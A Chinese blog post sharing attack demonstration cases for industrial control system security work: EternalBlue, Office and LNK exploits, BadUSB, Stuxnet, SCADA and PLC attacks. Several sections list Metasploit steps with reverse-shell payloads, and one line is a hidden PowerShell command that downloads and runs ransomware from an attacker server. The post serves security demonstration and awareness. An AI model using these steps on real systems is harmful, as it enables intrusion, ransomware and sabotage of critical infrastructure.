前言
在某核电的安全项目中,感谢公司leader信任让我负责项目的总体方案设计、攻防案例设计、安全防护等方案,经过前期大量的搜索、复现、思考、选取,顺利完成该项目的建设实施。于是,在此文中分享一些可以在工控安全项目中进行攻防演示的案例,以供大家参考。
针对工控系统上位机操作系统攻防案例
漏洞一:永恒之蓝
MS17-010 (永恒之蓝Eternalblue)
漏洞描述
永恒之蓝(Eternalblue)通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
漏洞影响
目前已知受影响的 Windows 版本包括但不限于:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012等。
演示步骤
1.使用nmap对目标进行扫描,确定目标存在永恒之蓝漏洞,执行如下命令nmap --script smb-vuln-ms17-010 192.168.28.128
2.使用Metasploit对目标进行攻击,执行如下操作
输入msfconsole启动Metasploit
在Metasploit中,输入search ms17-010查找永恒之蓝漏洞
输入 use exploit/windows/smb/ms17_010_eternalblue选择漏洞利用模块
输入 show options查看当前攻击配置
将配置中第一行的 RHOST修改为目标IP地址
配置完成后,输入 run命令执行漏洞攻击,如果执行成功,会获得目标机器windows系统的shell终端,可对该目标机器执行任何命令
针对工控系统上位机办公软件攻防案例
漏洞一:噩梦公式二代
CVE-2017-11882&CVE-2018-0802 (Microsoft Office内存破坏漏洞)
漏洞描述
在2017年11月14日,微软发布11月份安全补丁更新,其中更新了潜伏17年之久的Office远程代码执行漏洞(CVE-2017-11882) “噩梦公式一代“,而在2018年1月,又爆出了office 0day漏洞(CVE-2018-0802),该漏洞的技术原理类似17年修补的漏洞,是由于office公式编辑器组件EQNEDT32.EXE,对字体名的长度没有进行长度检验,导致攻击者可以通过构造恶意的字体名,执行任意代码。
漏洞影响
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2
Microsoft Office 2013 Service Pack 1
Microsoft Office 2016
演示步骤
1.下载漏洞利用脚本备用
2.使用Metasploit生成攻击反向控制后门文件
3.使用漏洞利用脚本,执行如下命令,生成包含漏洞的office文件 python RTF_11882_0802.py -c “mshta ” -o test.doc
4.将生成的test.doc文件,利用一些手段传给目标,当目标打开此文件时,会反弹出一个shell会话到攻击机,此时,攻击者已经控制了目标
针对工控系统上位机USB外设攻防案例
攻击手法一:震网三代
2010年,攻击伊朗核工厂的漏洞利用工具就是“震网一代”,它因此被公认为世界上首个网络“超级破坏性武器”。
2011 年,“震网二代”蠕虫病毒出现,因为它会在临时目录下生成名为~DQ 的随机文件,也被称作Duqu。
2017年6月14日凌晨,微软发布安全公告称,Windows快捷方式存在高危漏洞(CVE-2017-8464),黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统。3此漏洞与震网病毒攻破伊朗核电站使用的漏洞非常相似,对能源、交通、金融等基础设施隔离网极具杀伤力,因此定义为“震网三代”漏洞。
漏洞简介
“震网三代”漏洞是Windows系统在处理LNK文件(快捷方式)过程中发生的远程代码执行漏洞。当存在漏洞的电脑***入恶意U盘时,不需要任何操作,漏洞攻击程序就可以完全控制用户的电脑系统。该漏洞也可能由用户访问网络共享、网络下载、拷贝文件等操作被触发和植入木马。
“震网三代”漏洞的原理与震网病毒入侵破坏伊朗核设施所使用的漏洞(CVE-2010-2568)非常相似,都可以穿透隔离网络。由于物理隔离的基础设施和核心网络通常需要使用U盘、移动硬盘等存储设备进行数据交换,能够通过U盘触发的“震网三代”漏洞就成为渗透控制隔离网的大杀器,其威力完全不亚于前两代震网攻击。
“震网三代”漏洞影响从Vista到Win 10的所有主流版本,XP和2003则不受影响。目前微软已经发布了“震网三代”漏洞补丁,同期还修复了Windows搜索远程命令执行漏洞(CVE-2017-8543)等近百个漏洞。
漏洞影响
Windows 7
Windows 8.1
Windows RT 8.1
Windows 10
Windows Server 2008
Windows Server 2008 R2
Windows Server 2012
Windows Server 2012 R2
Windows Server 2016
演示步骤
1.打开msfconsole,进入metasploit控制台界面
2.指定攻击模块:use exploits/windows/fileformat/cve_2017_8464_lnk_rce
3.查看模块配置信息:show options
可以指定dll、link文件名
4.设置payload:
反弹meterpreter会话 set payload windows/x64/meterpreter/reverse_tcpset lhost 192.168.1.110 可以跟勒索病毒(或者PLC定向攻击脚本)结合,场景是利用震网三代漏洞制作的U盘插入待攻击机器,自动运行勒索程序(或者PLC定向攻击脚本)
set payload windows/x64/execset cmd “C:\Users\lenovo\Desktop\attack.py”或者利用`powershell`直接远程下载执行,提前利用python假设简单的http服务(python3 -m http.server)set cmd “powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile(‘http://192.168.159.151:8000/wcry.exe’,‘wcry.exe’);start-process wcry.exe”
5.最后执行 exploit,将生成的文件拷贝进干净、稳定、可用的U盘中即制作成功
攻击手法二:badUSB
原理简述
BadUSB最早是在2014年的黑帽大会上研究人员JakobLell和Karsten Nohl提出并展示的。不同于老式的U盘病毒,它利用了USB协议中的一个漏洞,通过模拟键盘、鼠标、网卡等从而让目标电脑执行恶意代码,达到控住主机或者窃取敏感信息等目的。
从传统意义讲,当你在电脑中插入一张CD/DVD光盘,或者插入一个USB设备时,可以通过自动播放来运行一个包含恶意的文件,不过自动播放功能被关闭时,autorun.inf文件就无法自动执行你的文件了。然而通过TEENSY,你可以模拟出一个键盘和鼠标,当你插入这个定制的USB设备时,电脑会识别为一个键盘,利用设备中的微处理器,与存储空间,和编程进去的攻击代码,就可以向主机发送控制命令,从而完全控制主机,无论自动播放是否开启,都可以成功。
演示步骤
1.攻击者事先制作好badUSB硬件设备,选择基于ATTINY85微控制器的USB开发板Digispark。
2.使用烧录代码的编译器Arduino IDE,将恶意代码烧录到BadUSB中。
3.配置好相关参数,将开发板设为Digispark,编程器设为USBtinyISP,编写好代码后,就可以点击“上传”按钮,然后插入BadUSB设备,一款简易BadUSB就做好了。
4.使用Metasploit生成攻击反向控制后门文件,执行如下命令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.128 LPORT=5555 -f exe 》shell.exe
5.在MSF服务端,开启监听,等待目标机器中后门反弹回shell
6.攻击者可诱使目标机器的使用者将特制的badu***设备插入目标设备,当目标机器***上U盘后,即会自动执行内部控制代码,在目标设备上模拟键鼠进行操作,下载执行了后门文件,此时攻击者就获得了目标机器反弹的shell,控制了目标机器。 针对工控系统编程组态软件攻防案例
攻击手法一:震网
Stuxnet(震网)
震网病毒简述
震网传播方式
Stuxnet 蠕虫的攻击目标是 SIMATIC WinCC 软件。后者主要用于工业控制系统的数据采集与监控,一般部署在专用的内部局域网中,并与外部互联网实行物理上的隔离。为了实现攻击,Stuxnet 蠕虫采取多种 手段进行渗透和传播,如图所示
整体的传播思路是:首先感染外部主机;然后感染 U 盘,利用快捷方式文件解析漏洞,传播到内部网络;在内网中,通过快捷方式解析漏洞、RPC 远程执行漏洞、打印机后台程序服务漏洞,实现联网主机之间的传播;最后抵达安装了 WinCC 软件的主机,展开攻击。
一旦发现WinCC系统,就利用其中的两个漏洞展开攻击
一个是WinCC系统中存在一个硬编码漏洞,保护访问数据库的默认用户名和密码,Stuxnet利用这一漏洞尝试访问该系统的SQL数据库
另一个是WinCC需要使用的Step7工程中,在打开工程文件时,存在DLL加载策略上的缺陷,从而导致一种类似于“DLL预加载攻击”的利用方式。最终,Stuxnet通过替换Step7软件中的s7otbxdx.dll,实现对一些查询、读取函数的Hook。
针对工控系统SCADA系统攻防案例
漏洞一:WebAccess
CVE-2017-16720
漏洞简述
此漏洞允许攻击者使用RPC协议通过TCP端口4592执行远程命令。
通过利用恶意分布式计算环境/远程过程调用(DCERPC),webvrpcs.exe服务将命令行指令传递给主机, webvrpcs.exe服务以管理员访问权限运行。版本小于8.3、8.3.1、8.3.2仍然存在特定的安全漏洞。
演示步骤
针对工控系统PLC攻防案例
攻击手法一:S7-1200启停
针对西门子S7协议或罗克韦尔AB Ethernet/IP、施耐德Modbus等工控协议,攻击者通过对主流工控协议的深度分析,向PLC设备发送远程停机、程序上传下载等控制指令数据报文,实现对下位机PLC的非法控制。
演示步骤
针对工控系统OPC数据通信攻防案例
攻击手法一
利用OPC协议漏洞,在通过OPC服务器与MES服务器进行数据通信过程中,攻击者可以伪装成合法的OPC Client对工控系统数据进行读写。
持续更新。。。。。.